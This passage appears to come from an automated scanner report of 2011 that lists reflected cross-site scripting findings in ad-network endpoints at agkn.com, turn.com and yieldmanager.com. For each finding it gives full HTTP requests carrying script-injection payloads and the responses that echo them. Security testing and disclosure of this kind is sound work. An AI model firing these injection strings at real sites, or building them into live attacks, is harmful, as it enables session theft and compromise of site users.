GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=12641331576"><script>alert(1)</script>5388910874&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=53894362007404304; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:28 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkAAAAAAB4BArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fiFkxme76tO0AAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:28 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=12641331576"><script>alert(1)</script>5388910874&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=1901865956?imid=2406266249759347636&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/
...[SNIP]...

2.4. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90f8a"%3balert(1)//dea654c72fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90f8a";alert(1)//dea654c72fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=&90f8a"%3balert(1)//dea654c72fb=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=141284751604938231; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:31 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkDAAAAAC4BArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjgZJgyzjKIaAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:31 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=&90f8a";alert(1)//dea654c72fb=1http://ad.agkn.com/interaction!che=883479704?imid=4042303976535532058&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Ser
...[SNIP]...

2.5. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7755c"><script>alert(1)</script>9545d5276 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=&7755c"><script>alert(1)</script>9545d5276=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=141284751604938231; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:31 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkDAAAAACwBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjJIR95jMVMPAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:31 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=&7755c"><script>alert(1)</script>9545d5276=1http://ad.agkn.com/interaction!che=328625300?imid=3623224920692052751&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Ser
...[SNIP]...

2.6. http://ad.agkn.com/iframe!t=1131! [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ab2"><script>alert(1)</script>6f8f881b193 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=b2ab2"><script>alert(1)</script>6f8f881b193 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=53894362007404304; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:29 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkBAAAAACIBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fkbIcRswpNtIAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:29 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=b2ab2"><script>alert(1)</script>6f8f881b193http://ad.agkn.com/interaction!che=125802957?imid=5100450939591252808&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Servi
...[SNIP]...

2.7. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1487f"><script>alert(1)</script>98cccecfc5d was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1487f"><script>alert(1)</script>98cccecfc5d&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:22 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=7651996674825166060&rnd=3546163719540081147&fpid=1487f"><script>alert(1)</script>98cccecfc5d&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

2.8. http://ad.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd44d"><script>alert(1)</script>dc42d0b4e10 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=6&sp=dd44d"><script>alert(1)</script>dc42d0b4e10 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:22 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=7651996674825166060&rnd=7846246777807154137&fpid=6&nu=n&t=&sp=dd44d"><script>alert(1)</script>dc42d0b4e10&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

2.9. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75549"><script>alert(1)</script>e68499ff4ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&site=334050&section_code=14494094&cb=1315404889357362&yrc=&ycg=&yyob=&yprop=au_news&ypos=N&75549"><script>alert(1)</script>e68499ff4ce=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=pR#?yN0FYbx1Nl=; ih="b!!!!3!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; vuday1=%)0sI!!w[/N0FYbn[@`@; pv1="b!!!!(!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~"; BX=ei08qcd75vc4d&b=3&s=8s&t=246; lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00AM5JknRO1[uD%T4O

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:34 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:16:34 GMT
Pragma: no-cache
Content-Length: 4931
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?75549"><script>alert(1)</script>e68499ff4ce=1&Z=728x90&cb=1315404889357362&S=14494094&i=334050&ycg=&ypos=N&yprop=au%5fnews&yrc=&yyob=&_salt=1771892927&t=2" target="_parent">
...[SNIP]...

2.10. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66ccc"-alert(1)-"1cf28eb4781 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=728x90&site=334050&section_code=14494094&cb=1315404889357362&yrc=&ycg=&yyob=&yprop=au_news&ypos=N&66ccc"-alert(1)-"1cf28eb4781=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=pR#?yN0FYbx1Nl=; ih="b!!!!3!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; 